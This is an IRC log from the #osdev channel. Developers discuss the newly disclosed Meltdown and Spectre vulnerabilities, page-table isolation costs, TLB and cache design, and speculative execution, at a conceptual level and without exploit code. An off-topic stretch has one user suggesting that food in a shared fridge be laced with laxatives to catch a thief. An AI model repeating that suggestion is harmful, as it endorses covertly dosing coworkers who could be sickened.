10:33:38 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
10:33:54 --- join: glauxosdever (~alex@ppp-94-66-43-97.home.otenet.gr) joined #osdev
10:35:07 --- quit: uvgroovy (Quit: uvgroovy)
10:37:14 --- quit: alphawarr1or (Quit: Connection closed for inactivity)
10:42:28 --- quit: bauen1 (Ping timeout: 240 seconds)
10:42:59 --- join: awang_ (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
10:59:02 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
11:08:43 --- join: srjek (~srjek@2601:249:601:9e9d:5000:7283:c2fb:32f8) joined #osdev
11:12:24 --- quit: divine (Ping timeout: 248 seconds)
11:13:37 --- quit: grzesiek (Remote host closed the connection)
11:16:28 --- join: divine (~divine@12.164.17.129) joined #osdev
11:31:34 --- quit: jack_rabbit (Ping timeout: 248 seconds)
11:31:46 --- quit: bemeurer (Remote host closed the connection)
11:32:10 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
11:33:59 <Love4Boobies> Man, for the last day, everyone on my Facebook feed has been talking about the huge Intel vulnerability.
11:34:09 <Love4Boobies> People love a good story.
11:35:24 --- quit: jjuran (Quit: jjuran)
11:38:41 --- join: jack_rabbit (~jack_rabb@c-98-228-48-226.hsd1.il.comcast.net) joined #osdev
11:38:56 <geist> indeed
11:39:09 <geist> will be interesting to see if it lives up to expectations
11:39:53 <Love4Boobies> How are commits to Linux handled in this situation?
11:40:04 --- join: inode (~inode@unaffiliated/inode) joined #osdev
11:40:14 <geist> they seem to be public of course, but the commentary is fairly vague
11:40:28 <geist> i think there's a little bit of shade being thrown between @intel.com and @amd.com
11:40:45 <Brnocrist> so what about ARM?
11:40:57 <Brnocrist> there is a linux patch, but it should be not affected
11:41:29 <geist> here's my theory: the 'unmap the kernel' thing was already in motion, becase folks have already discovered how to defeat KASLR on page table based arches (x86 and arm)
11:41:51 <geist> but this new vuln for intel i think has made it mandatory
11:43:16 --- join: dbittman|work (~dbittman|@apollo.soe.ucsc.edu) joined #osdev
11:43:32 <Brnocrist> I think so
11:44:09 <geist> in the case of ARM unmapping the kernel is fairly inexpensive, so it's mostly just a Good Idea
11:44:43 <geist> though it's possible they have a similar problem, but most ARM cores are not superscalar/OOO enough to actually do what i think the vuln is
11:45:00 <geist> but then they probably have more advanced cores in the pipeline, so maybe one of the newer ones has the problem
11:45:29 <Brnocrist> is it inexpensive on arm?
11:45:51 <geist> it should be, the MMU is similar in structure but a bit more flexible
11:46:13 <Brnocrist> it uses something like PCID?
11:46:17 --- quit: dbittman|work (Read error: Connection reset by peer)
11:46:31 <geist> yes, ASID. always has had it. it also has nice per ASID TLB flush instructions and whatnot
11:46:35 <geist> which is what x86 misses, iirc
11:47:00 --- join: dbittman|work (~dbittman|@apollo.soe.ucsc.edu) joined #osdev
11:47:04 <geist> also ARM has a split page table already. ie, there are essentially two CR3s with two page table trees, for both halves of the address space
11:47:07 --- join: tacco\unfoog (~tacco@dslb-084-057-127-104.084.057.pools.vodafone-ip.de) joined #osdev
11:47:15 <geist> so you can simply swap the kernel portion of it to one with a different ASID
11:47:23 <marshmallow> sorry but besides defeating kASLR and reading arbitrary memory, what else could be the damages?
11:47:24 <geist> and that should be cheap
11:47:25 <Brnocrist> oh it is nice
11:47:47 <dbittman|work> huh. rebooting freebsd in qemu on my linux box causes the computer (host) to freeze. that's inconvenient.
11:48:03 <Brnocrist> it is way better than TLB splitting
11:48:09 <dbittman|work> marshmallow: those are both pretty damaging...
11:48:13 <geist> marshmallow: if you can read aribtrary memory that's completely armageddon
11:48:25 <geist> since you can just read critical passwords or whatever out of the kernel, it's a nonstarter
11:48:33 <dbittman|work> that's "you win, arbitrarily" level
11:48:54 --- nick: clickjack -> immersive
11:49:20 <geist> https://78.media.tumblr.com/ddd32c24adec676229973b8d34113684/tumblr_ojo5vgNgAo1vaqoiqo1_500.gif
11:49:21 <marshmallow> reading out of ring0 is for sure critical per se, but would it be possible to achieve some sort of kernel execution too?
11:49:58 <marshmallow> (and passwords aren't stored in hash btw?)
11:50:14 <geist> if you can read the kernel you can read any in flight buffer, and in the cast of linux, all of physical memory is mapped there
11:50:29 <geist> and page tables, so you can now figure out what pages are mapped wherever, and then rowhammer is much more powerful, etc
11:50:35 --- join: CheckDavid (uid14990@gateway/web/irccloud.com/x-oztbsxvyhembhdwx) joined #osdev
11:50:44 <geist> you could read cached files that you have no access to, etc
11:51:02 --- quit: jakogut (Quit: jakogut)
11:51:11 <_mjg> and see the passwords people type in
11:51:15 <geist> all network traffic, etc
11:51:29 <geist> yeah basically you can read any data in the system
11:51:37 <roxfan> just veeeery slowly
11:51:41 <geist> so you're just DOA right there
11:52:03 <geist> yeah, though so far i've been astonished at the level folks will go to take itty bitty info in these sploits and build a complete picture out of it
11:52:24 <geist> but, i dunno what it is precisely. i suppose i could ask around at work, but then i'd know and i'd have to shut up here
11:52:27 --- quit: paranoidandroid_ (Ping timeout: 260 seconds)
11:52:33 <geist> it's more fun to no know and wait
11:58:55 --- quit: bauen1 (Ping timeout: 252 seconds)
11:59:31 --- quit: quc (Ping timeout: 264 seconds)
11:59:33 --- join: jakogut (~jakogut_@162.251.69.147) joined #osdev
11:59:38 --- quit: vmlinuz (Quit: Leaving)
12:01:33 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
12:02:59 --- join: jakogut_ (~jakogut_@162.251.69.147) joined #osdev
12:03:02 --- quit: jakogut (Read error: Connection reset by peer)
12:03:41 --- nick: jakogut_ -> jakogut
12:06:06 --- quit: oaken-source (Ping timeout: 265 seconds)
12:11:07 --- join: TopSekret (~TopSekret@host-80-238-111-9.jmdi.pl) joined #osdev
12:11:54 --- quit: TopSekret (Client Quit)
12:14:52 --- quit: bemeurer (Ping timeout: 252 seconds)
12:16:11 --- join: virtx (5238cd4e@gateway/web/freenode/ip.82.56.205.78) joined #osdev
12:16:13 <virtx> hi
12:16:42 <sham1> hi
12:16:58 <virtx> why page tables reside before L2 cache? are not they in RAM? https://cyberwtf.files.wordpress.com/2017/07/memory-hierachy.png
12:17:17 <geist> they are
12:17:28 <virtx> so what does that mean in this img?
12:17:32 <geist> it's just wrong
12:17:49 <geist> there is no 'page table' box like that
12:18:14 <virtx> so it is not me :)
12:18:36 <geist> from a memory heirarchy point of view i think they were attempting to illustrate not the physical layout but more of the path the memory subsystem goes through to access memory
12:18:49 <virtx> When a software running on a Core requires memory it starts a so called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurred. The Figure below shows a simplified version of this sub system.
12:18:53 <virtx> this is the text
12:18:55 <geist> i think it may be technically correct, if the L1 caches are virtually tagged, which i think is actually maybe true
12:19:37 <geist> but it's not showing the physical layout, it's showing you the path that the system takes to resolve addresses and/or access
12:19:43 <virtx> so PTs are accessed before L2?
12:20:09 <geist> so assume the PTs are a black box that live in their own memory (they dont, but lets assume). then yes
12:20:22 <virtx> hmm
12:20:31 <geist> it has to consult the TLB and possibly page tables to do the translation before it knows what address to fetch from the L2
12:20:34 <geist> which is physically tagged
12:20:50 <virtx> if an address resides in L2, why cpu should try in PT (that are in DRAM) before?
12:20:56 <geist> now it might have to go read the L2 to get to a page table, but that's essentially a separate path that hardware takes to do the translation for you
12:21:10 <geist> if you considet the MMU to be essentially a parallel cpu doing the translation on the main cpu's behalf
12:21:24 <geist> which i think is the proper model to consider
12:21:45 <virtx> ah ok, so PTs in that img is MMU/TLB access
12:21:54 <geist> in that case then the MMU may or may not need to in parallel (or before or whatnot) access the L1/L2/L3/DRAM to translate memory for the main cpu
12:21:58 <geist> yah
12:22:10 <virtx> makes sense
12:22:52 <geist> so that's where a lot of problems happen nowadays. using timing attacks you can force the MMU to go and do page table accesses which end up taking variable amount of time based on how far it needs to search
12:23:03 <geist> and leave the cache in particular states as a result of its memory access
12:23:28 <geist> and then you can use timing to determine if it actually walked a page table structure for you, even if you ultimately have no permission to access that memory
12:23:39 <virtx> I have a very 'stupid' question regarding this, CPU handles only physical address, so how "mov rax, 0xsomevirtaddr" is handled by cpu? it never knows the virt addr, but only MMU knows?
12:23:47 <geist> so you can, for example, probe if any given page is mapped in the kernel, but not necessarily access it
12:24:23 <geist> that's correct. the cpu basically immediately hands the virtua address off to the TLB, which is the local cache part of the MMU, which tries to translate it into a physical address
12:24:51 <geist> and then if it gets a hit it continues on down, if it misses, then the MMU holds off the cpu for this particular memory access and does a page table walk to see if it can fill the TLB and continue
12:25:07 <geist> this is why modern cpus are so out of order and like to prefetch so much and have so many memory operations in flight
12:25:34 <geist> it tries to access things as far in the future as it can to try to hide any latency picked up by the MMU and L1/L2/L3 caches
12:25:41 --- quit: R3x_ (Quit: Connection closed for inactivity)
12:26:03 <virtx> yes, but in my code I have virtual address, this address it is never passed to CPU, how it asks the MMU to translate phys addr?
12:26:26 <geist> sure it is. your code only deals with virtual addresses
12:26:46 <geist> it passes the virtual off to the TLB which translates it, then it accesses the physical address from then on out
12:27:10 <clever> geist: the intel bug, is it only an "address is mapped" leak, or a data leak?, and how exactly would something like javascript interact with it?
12:27:17 <geist> part of this is if you consider the MMU to be part of the 'cpu' or not. for sake of discussion here, i'm considering it to be more or less independent of the core cpu
12:27:24 <geist> clever: not a clue. i dont know
12:27:58 <virtx> I consider it part of a core (not CPU) but an independent unit
12:28:10 <geist> right. however you want to
12:28:24 <geist> but, point is it acts on behalf of the cpu
12:28:31 <virtx> yes
12:28:35 <geist> cpu gives it virtual addresses, and it does the trnaslation to physical
12:29:07 <geist> note there's a subtlety that i kind of dont want to go into becaus eyou really need to understand cpu caches, but the original image is actually kind of correct
12:29:34 <geist> it puts the page tables *after* the L1. which is i think correct. modern intel x86s and most ARMs i kow of (i dunno what AMD does) virtually index/tag the L1 cache
12:29:45 <geist> so i think for L1 cache hits you dont need to actually consult the TLB
12:29:48 <virtx> yes, do you suggest some doc about cache that is not so theoretical but very practice and so close the OS?
12:29:56 <geist> but, then there's a bunch of complexity there to make sure L1 caches dont alias each other
12:30:30 <geist> and at some point i completely grokked at least ARM's version of how they pull it off, but i forgot it
12:30:55 <geist> it has a lot ot do with the reason L1 caches are more or less always the same size at around 32K or 64K. something to do with ways/sets lining up with PAGE_SIZE so that you can make sure stuff doesn't alias
12:31:34 <virtx> so L1 contains an entire page, not part of it?
12:31:51 <geist> no. they have th same cache line as L2
12:32:03 <geist> but really it's complex what i'm talking about and I can't really explain it
12:32:13 <geist> but suffice to say L1 caches aren't much different
12:32:29 <geist> but... if you want to learn cpu architecture i have two books right in front of me that i highly recommend
12:32:45 <virtx> shot the names :D
12:32:49 <geist> 1) 'Computer architecture - A quantitative approach' by Hennessy and Patterson
12:33:16 <geist> 2) 'Modern Processor Design - Fundamentals of Superscalar Processors' by Shen and Lipasti
12:33:26 <geist> the second one is quite advanced, but full of good infos
12:33:54 <geist> the first one is fairly old, but they keep putting out newer editions so it stays mostly up to date
12:33:56 <virtx> I have the second one.
12:34:06 <virtx> thanks
12:34:49 <geist> anyway, the firs tone im sure talks about caches. the key is learning about ways and sets and whatnot and how they're organized
12:35:05 <geist> i dont think it has changed much, except particular techniques depending on how you want to layer multiple sets of caches
12:35:10 --- quit: Halofreak1990 (Ping timeout: 256 seconds)
12:35:15 <geist> wikipedia probably has a decent description if anything
12:35:45 <virtx> I know how it works in general, probably to understand this kind of thing I don't need a very deeper knowledge about cache
12:35:50 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
12:36:39 <geist> then theres of couse virtual vs physical indexing and tagging
12:36:45 <geist> VIVT, VIPT, PIPT, etc
12:37:01 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
12:37:06 <geist> and there are clever trick s(what I was talking about before with L1) that make VIPT things act like PIPT in certain situations, etc
12:37:29 <geist> PIPT is totally desirable from a programming point of view, but it is slower becaus eyou have to translate virtual addresses before you can go to the cache
12:37:44 <virtx> VIVT stands for?
12:37:49 <geist> so there are tricks to make the L1 cache look PIPT even if it's VIVT or VIPT
12:38:03 <geist> see index tagging statement i made befoe
12:38:11 <virtx> ah ok
12:38:40 <geist> anyway, a strong understanding of all this stuff i've found to be very very useful
12:38:54 <geist> because you start to see why cpu architecture descisions were made, and that actually helps osdev quite a bit
12:39:02 <geist> especially with SMP and whatnot
12:43:34 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
12:44:45 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
12:51:59 <Love4Boobies> Ah, I just accidentally discovered what the hell ~/Templates is.
12:52:56 <roxfan> accidentally?
12:53:41 <Love4Boobies> Yeah, I put some stuff in there and they showed up in New Document context menu (when I right click).
12:55:04 <Love4Boobies> I don't generally create documents that way in Linux so it's probably why I never knew. I wasn't curious what that directory was either.
12:56:59 <geist> oh that's kind of neat
12:57:57 <Love4Boobies> Yeah. You can put source files in there with copyright notices and stuff, I suppose.
12:59:01 <geist> or snarky passive aggressive notes to cow-orkers that steal your food from the fridge
12:59:07 <geist> yes you Brenda!
12:59:13 --- quit: MDude (Quit: Going offline, see ya! (www.adiirc.com))
12:59:20 <_mjg> dude
12:59:38 <_mjg> stealing food from the fridge is one of the things i really did not expect at a workplace
13:00:56 <_mjg> one dude got hit hardcore, he was buying an expensive sausage (don't ask) and someone was regularly stealing it
13:01:17 --- quit: virtx (Ping timeout: 260 seconds)
13:01:36 --- join: jjuran (~jjuran@172.58.185.5) joined #osdev
13:03:52 <graphitemaster> why would you ever do that anyways
13:04:10 <graphitemaster> like "oh I forgot to pack a lunch, I'm just going to eat what ever is in the fridge"
13:04:11 <Love4Boobies> What if you get caught?
13:04:16 <wcstok> Because you're a dick?
13:04:29 <wcstok> Some people just are
13:04:36 <_mjg> there was a bunch of people in their early 20's working almost minimal wage in customer service
13:04:36 <Love4Boobies> I mean you have to see your coworkers everyday. Do you really wanna go through that?
13:04:42 <_mjg> one of them was doing that
13:04:48 --- join: KidBeta (~textual@220-244-156-86.tpgi.com.au) joined #osdev
13:05:39 <graphitemaster> I would just leave pieces of food in the fridge cooked withg laxitives in it
13:05:56 <graphitemaster> you'll quickly figure out who is eating your stuff
13:05:58 <Love4Boobies> What if no one touches them?
13:06:08 <graphitemaster> I throw 'em out periodically
13:06:18 <Love4Boobies> Then you have to cook for no one and buy laxatives all the time.
13:06:21 <graphitemaster> yes
13:06:27 <Love4Boobies> :)
13:06:31 <graphitemaster> which is fine
13:06:41 <wcstok> Then you change up the bait
13:06:43 <graphitemaster> the price you pay for an honest work place.
13:07:42 --- quit: regreg_ (Ping timeout: 250 seconds)
13:07:57 <Love4Boobies> Also, I think it might be illegal to hide meds in fridge --- even if it's in your own food --- as long as it's in a common fridge.
13:08:08 <graphitemaster> try me
13:08:11 <Love4Boobies> Because the assumption is that people my mistake your food for theirs.
13:08:40 <Love4Boobies> Here's a better idea: put a label that says it has laxatives but don't actually put any laxatives insides.
13:08:54 <Love4Boobies> Then eat your food. And tell everyone you have shitty digestion.
13:09:12 <graphitemaster> so not only are you asshole enough to steal food, but you're asshole enough to steal food that makes you sick, sue the person who tainted it, and carry through with legal costs?
13:09:19 <graphitemaster> that's some serious asshole
13:09:51 <graphitemaster> at that point a sane judge would look at you and be like "wtf man"
13:10:44 <graphitemaster> and when word got around that you do this in the office
13:10:48 <graphitemaster> I'm sure you'd get fired
13:12:19 --- quit: glauxosdever (Quit: leaving)
13:12:37 --- join: sortie (~sortie@static-5-186-55-44.ip.fibianet.dk) joined #osdev
13:14:04 --- quit: bemeurer (Quit: Leaving)
13:20:55 --- quit: navidr (Quit: Connection closed for inactivity)
13:30:30 --- quit: jack_rabbit (Ping timeout: 248 seconds)
13:32:38 --- quit: marshmallow (Quit: Textual IRC Client: www.textualapp.com)
13:33:10 --- quit: because (Ping timeout: 248 seconds)
13:35:57 --- join: raphaelsc (~utroz@187.114.6.255) joined #osdev
13:36:04 --- join: immibis (~chatzilla@122-59-200-50.jetstream.xtra.co.nz) joined #osdev
13:36:11 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
13:39:16 --- join: Darmor (~Tom@198.91.187.5) joined #osdev
13:40:06 --- quit: Asu (Ping timeout: 248 seconds)
13:42:42 --- join: Asu (~sdelang@92.184.96.213) joined #osdev
13:43:05 --- join: jack_rabbit (~jack_rabb@c-73-211-181-224.hsd1.il.comcast.net) joined #osdev
13:47:20 --- quit: Belxjander (Ping timeout: 240 seconds)
13:48:27 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
13:48:31 --- quit: Asu (Remote host closed the connection)
13:53:25 --- join: Shamar (~giacomote@unaffiliated/giacomotesio) joined #osdev
13:56:47 --- quit: banisterfiend (Quit: My MacBook has gone to sleep. ZZZzzz…)
13:57:41 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
13:59:01 --- quit: CheckDavid (Quit: Connection closed for inactivity)
14:02:03 --- quit: jjuran (Quit: jjuran)
14:03:50 --- join: Asu (~sdelang@92.184.101.102) joined #osdev
14:04:52 --- join: banisterfiend (~banister@ruby/staff/banisterfiend) joined #osdev
14:09:10 --- join: cr1901_modern (~William@c-73-160-175-67.hsd1.nj.comcast.net) joined #osdev
14:09:43 --- quit: banisterfiend (Ping timeout: 260 seconds)
14:11:52 --- quit: KidBeta (Changing host)
14:11:53 --- join: KidBeta (~textual@hpavc/kidbeta) joined #osdev
14:18:45 --- join: MDude (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
14:19:51 --- quit: Asu (Remote host closed the connection)
14:23:58 --- quit: MDude (Ping timeout: 240 seconds)
14:24:29 --- join: marcan (marcan@marcansoft.com) joined #osdev
14:34:33 --- join: heat (~heat@sortix/contributor/heat) joined #osdev
14:36:41 <Griwes> anyone linked https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html yet?
14:36:42 <bslsk05> ​googleprojectzero.blogspot.com: Project Zero: Reading privileged memory with a side-channel
14:36:55 <cr1901_modern> "Don't ask to ask"- ahh I see where you get that from now, sortie
14:38:58 <sortie> Griwes: Oh that was finally released
14:39:17 <Griwes> yeah, due to that tweet from earlier today I think
14:39:40 <froggey> cute names & flashy websites: https://meltdownattack.com/ https://spectreattack.com/
14:39:40 <bslsk05> ​meltdownattack.com: Meltdown and Spectre
14:39:41 <bslsk05> ​spectreattack.com: Meltdown and Spectre
14:39:46 <sortie> > 2017-06-01
14:39:52 <sortie> Now that's what I call an embargo
14:40:05 <Griwes> yeah :D
14:40:39 <cr1901_modern> Looks like ARM/AMD lied then
14:41:10 <heat> uh oh that's pretty bad
14:41:29 <heat> there's no good solution though
14:42:20 <heat> apparently linux's PTI slows down the program by 40% and breaks some userspace crap
14:44:07 <geist> cr1901_modern: sort of, only some of them apply to AMD/ARM, but there is a whole family of attacks, basically
14:44:58 <froggey> I read the original KAISER paper today, they claim a slowdown of only 0.28%. that's quite a difference
14:45:28 <sortie> Tested Processors "Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz"
14:45:37 <sortie> lol. They just tested it on their developer workstation.
14:45:40 <pictron> Pretty sure that was just due to PCID
14:45:54 <heat> yeah, PCID is probably a big help
14:46:34 --- quit: Retr0id (Remote host closed the connection)
14:47:46 <cr1901_modern> Is PCID like "ASID, but for x86", or something more?
14:47:55 <geist> yes
14:48:20 <geist> sortie: yeah variant 3 is the bad one, and that seems to only effect haswell, or at least proven
14:48:36 --- quit: teej (Quit: Connection closed for inactivity)
14:48:44 <geist> some of the variants are reading code within the same address space, or using eBPF to read memor inside the kernel
14:48:53 <geist> and cripes, eBPF looks like a terrible idea
14:49:24 <sortie> geist: Variant 1 also sounds pretty bad
14:49:38 <sortie> See PoC 2
14:49:54 <geist> yeah but you need code running in supervisor mode to do it (via BPF)
14:50:08 <sortie> Not on the Intel Haswell Xeon CPU?
14:50:16 <sortie> BPF JIT is for AMD?
14:50:19 <geist> basically yo ushove in some BPF code, which gets jitted in the kernel, which then does variant 1
14:50:32 <geist> BPF jit is i think just a feature of linux
14:50:57 <sortie> BPF JIT is enabled on Intel by default but not AMD?
14:51:05 <geist> *shrug*
14:51:06 <geist> i have no idea
14:51:10 <sortie> Yeah still reading
14:51:20 <geist> but it says variant 1 works on AMD too. but that makes sense
14:51:31 <geist> that's just a local timing attack, doesn't rely on any hardware bugs
14:51:40 <geist> just a speculattive load timing thing
14:51:45 <sortie> Hmm
14:51:49 <Griwes> this is a damn clever exploitation of how speculative execution works
14:52:09 <geist> indeed
14:52:19 <geist> i'm learning a lot from this
14:52:39 <geist> variant 3 is brutal
14:53:03 --- join: adam4813 (uid52180@gateway/web/irccloud.com/x-zhvyjkqnywjogzuf) joined #osdev
14:53:09 <geist> also interesting, it's totally based on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ which we were looking at before
14:53:10 <bslsk05> ​cyber.wtf: Negative Result: Reading Kernel Memory From User Mode – cyber.wtf
14:54:09 <geist> that seems to be intel specific. seems to rely on speculative execution running asynchronously with permission checks
14:54:22 <Griwes> so apparently AMD doesn't allow speculative memory references into higher privilege mode?
14:54:58 <geist> would appear to be so
14:55:01 <Griwes> https://lkml.org/lkml/2017/12/27/2
14:55:01 <bslsk05> ​lkml.org: LKML: Tom Lendacky: [PATCH] x86/cpu, x86/pti: Do not enable PTI on AMD processors
14:55:30 <cr1901_modern> There's too much conflicting info to parse right now
14:55:32 <Griwes> I don't understand how the bpf thing works on AMD then, seems I need to keep reading
14:55:34 <geist> if it synchronously checked the permission before going any further (which is probably lower performance) then it wouldn't get any farther
14:55:48 <geist> Griwes: the bpf thing isn't cross permission
14:56:06 <Griwes> ah!
14:56:08 <Griwes> gotcha
14:56:14 <geist> variant one attacks the local address space. linux has a (i think terrible idea) way to inject little programs into kernel space which it JITs
14:56:27 <geist> so you can effectively jam in a BPF program that does the attack on kernel space from kernel space
14:56:46 --- join: uvgroovy_ (~uvgroovy@199.188.233.130) joined #osdev
14:56:47 <geist> ARM is apparently subject to variant 1 too, which makes sense
14:57:07 <geist> since that's more of a generic attack on anything with caches and page tables
14:57:36 <Griwes> does ARM check the privilege levels in speculative execution like AMD?
14:57:47 <geist> unknown
14:57:53 <geist> (to me at least)
14:58:32 --- quit: uvgroovy (Ping timeout: 256 seconds)
14:58:32 --- nick: uvgroovy_ -> uvgroovy
14:58:46 <Griwes> alright, time to read variant 2
14:58:56 <Griwes> ring 0 to ring -1 is always a fun thing
14:59:13 <geist> yeah variant 2 is gnarly. seems to use the BTB to figure stuff out
14:59:21 <doug16k> so what's the good-case workaround? switch PCID when entering kernel space to avoid flushing whole TLB?
14:59:30 <geist> doug16k: i think so
14:59:41 --- join: navidr (uid112413@gateway/web/irccloud.com/x-wxhyyksnbqkzqeia) joined #osdev
14:59:42 <geist> essentially put in a little trampoline that switches address spaces
14:59:52 <geist> and probably dumping the entire BTB cache, for variant 2
15:00:26 <geist> branch target buffer, i think. it's the branch predictor cache, which i think is virutally tagged.
15:00:30 <Griwes> geist, ARM has separate top-level registers for user space and kernel space virtual mem, right?
15:00:31 --- join: svk (~svk@port-92-203-6-87.dynamic.qsc.de) joined #osdev
15:00:59 <geist> correct. and ASIDs for them
15:01:06 <graphitemaster> tl;dr speculative execution is hard to get right
15:01:13 <geist> so swapping just the kernel out isn't that expensive
15:01:18 <geist> though it's additional work and stuff
15:01:19 <Griwes> yeah
15:01:28 <geist> you'd probably still want to dump the BTB though, i suspect. which is non free
15:01:31 <Griwes> that's what I thought I remembered, but I wasn't sure
15:02:14 <geist> in short, it's easy to implement FUCKWIT on arm
15:02:39 <radens> geist: does fuschia implement KPTI/shadow kernel page tables?
15:02:46 <Griwes> I see you prefer the better name
15:03:02 <geist> radens: not yet
15:03:13 <geist> it's going to be brutal
15:03:16 --- part: wcstok left #osdev
15:04:07 <radens> it's really that brutal? I thought it would be straightforward, except for that pesky trampoline page.
15:04:21 <Griwes> > (There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
15:04:23 <Griwes> jeez
15:06:17 <geist> radens: with PCID i'm thinking it's mostly just going to be additional memory (need a second top level page table for each process) and some additional complexity on every syscall/interrrupt
15:06:35 <geist> depending on how expensive the syscall is it may add a substantial amount of time, however
15:06:52 <radens> ah, yes
15:06:57 <geist> say, the whole thing adds a few hundred cycles. well if your syscall path was already 100 cycles, then it just doubled the depth
15:07:15 <graphitemaster> fuschia is goign to take a big hit, considering it's a microkernel, the kernel <-> user space context switch is much higher than a monolithic design
15:07:21 <cr1901_modern> geist: "you'd probably still want to dump the BTB though, i suspect. which is non free" AFAIK, TLB also needs to be flushed on syscall entry/exit anyway?
15:07:21 <heat> geist: What about system calls though? How would they access memory?
15:07:25 <graphitemaster> I'd say 40 to 50% performance in your case
15:08:23 <Griwes> okay, midnight is definitely not the time when I'll understand variant 2
15:08:37 <Griwes> at least not by reading the project0 blog post
15:09:26 <graphitemaster> why should we be worried about it tho
15:09:47 <Griwes> what are you asking about, specifically
15:10:06 <radens> The perf increase or leaking arbitrary kernel addresses or leaking kernel memory?
15:10:17 <doug16k> is any of this feasible with rdtsc disabled in user mode?
15:10:26 <geist> cr1901_modern: the point is to use PCID or ASID to avoid the TLB dump
15:10:28 <graphitemaster> like in the case for fuchsia, by the time they get anything out for commercial use, all the silicon will be fixed :P
15:10:36 <geist> heat: you context switch
15:11:08 <heat> geist: Yeah but system calls need to access user memory as well?
15:11:09 <graphitemaster> doug16k, yes, create a thread, increment in a for loop, time with that
15:11:12 <cr1901_modern> geist: Oh right (most of my q's in here are going to point out that I'm actually pretty shitty w/ MMUs/TLBs)
15:11:35 <graphitemaster> (increment a counter I mean)
15:11:36 <doug16k> graphitemaster, and the RFO cache line ping pong makes a mess of the timing
15:12:09 <graphitemaster> doug16k, sure but it's not as big of a mess to hide the timing difference
15:12:21 <graphitemaster> they already have a PoC with webworkers in JS doing this btw
15:12:24 <radens> doug16k: won't it be fine if it's on the same logical core?
15:13:29 <graphitemaster> how big of a hit would it be if we outright disabled speculative execution on CPUs
15:13:39 <doug16k> massive hit
15:13:40 <graphitemaster> that's a microcode reachable thing
15:14:04 <graphitemaster> anyone have some educated guesses on how massive of a hit?
15:14:18 --- quit: uvgroovy (Quit: uvgroovy)
15:14:43 <doug16k> basically every instruction is serializing?
15:14:49 <graphitemaster> yes
15:15:05 <doug16k> the cpu would idle at every cache miss
15:15:05 <Griwes> lol disabling speculative execution
15:15:18 <cr1901_modern> I would've figured a good branch predictor would mitigate mispredict cost even in deep pipeline. Doesn't stop mispredict from being _bad_ though
15:15:33 <geist> i did note that these tests were not done on a Ryzen. hopefully AMD didn't introduce the same bug with their core redesign
15:16:17 <graphitemaster> I want numbers :P
15:16:48 <graphitemaster> I don't want a "a massive hit" because that really doesn't mean anything.
15:17:00 <cr1901_modern> Actually, are speculative execution/branch prediction orthogonal?
15:17:06 <doug16k> graphitemaster, go look at the latencies of instructions, that's how many cycles everything would take. zero overlap
15:17:16 <graphitemaster> doug16k, and that's a bad thing how?
15:17:18 <Griwes> cr1901_modern, ...not really
15:17:23 <graphitemaster> most code avoids high latency instructions anyways
15:17:29 <Griwes> what do you predict if you're not executing forward?
15:17:31 <graphitemaster> and similarly, lots of code uses SIMD
15:17:32 <doug16k> graphitemaster, right now it overlaps a ton
15:17:43 <cr1901_modern> Griwes: You do _both_ branches?
15:17:48 --- quit: daniele_athome (Ping timeout: 256 seconds)
15:17:49 <graphitemaster> doug16k, rough estimate, 400% slower?
15:17:55 <cr1901_modern> at once, and then discard the one that was incorrect
15:18:07 <svk> geist, spectre was successful on ryzen, see 4.1, on meltdown they were unsuccessful "on several AMD CPUs"
15:18:08 <Griwes> ah
15:18:12 <Griwes> I see what you mean
15:18:24 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
15:18:25 <Griwes> I'm not sure how feasible that is though
15:18:32 --- quit: inode (Quit: )
15:18:42 <cr1901_modern> I thought that's what speculative execution did
15:19:04 <graphitemaster> you predict in a tree shape
15:19:08 <Griwes> there's a gigantic amount of branches that you hit constantly and I don't how how it'd ever work with the performance it currently has without branch prediction
15:19:08 <graphitemaster> both branches are taken
15:19:15 <graphitemaster> and inside each branch if there is more it predicts further
15:19:27 <graphitemaster> if the top leaf fails a branch
15:19:35 <graphitemaster> everything in that leaf is a failed predict
15:19:37 <Griwes> but at some point you have to make a decision, because you don't have an unlimited number of pipelines to speculatively execute the branches
15:19:38 <doug16k> graphitemaster, at least. what would be the point of parallel decode if it can only do one instruction at a time? it would be as if you went back to an 80486 with a better FPU
15:20:03 <cr1901_modern> Griwes: Ahhh right
15:20:10 --- quit: _sfiguser (Quit: Leaving)
15:20:21 <graphitemaster> doug16k, you could still pipleine a lot without speculative execution, you could still schedule in parallel, you could still execute statements out of order and multiple ones in parallel
15:20:29 <graphitemaster> doug16k, you just couldn't ACT on branches spoeculatively
15:20:41 <graphitemaster> I doubt speculative branch execution would be that significant
15:20:53 <graphitemaster> if disabled
15:21:04 <graphitemaster> it would likely be less than the current IPT patches
15:21:07 <graphitemaster> I'm guessing
15:21:52 <graphitemaster> the only thing that would have to serialize is branches basically
15:21:57 <doug16k> oh you mean speculating through branches? that's not all speculative execution means
15:22:29 <graphitemaster> well the problem with spectre is that it executes speculatively through branches
15:22:36 <graphitemaster> and that's where the leak happens
15:22:51 <doug16k> mainly it means speculating ahead and finding independent dependency chains, that you can start working on while waiting for a cache miss earlier on
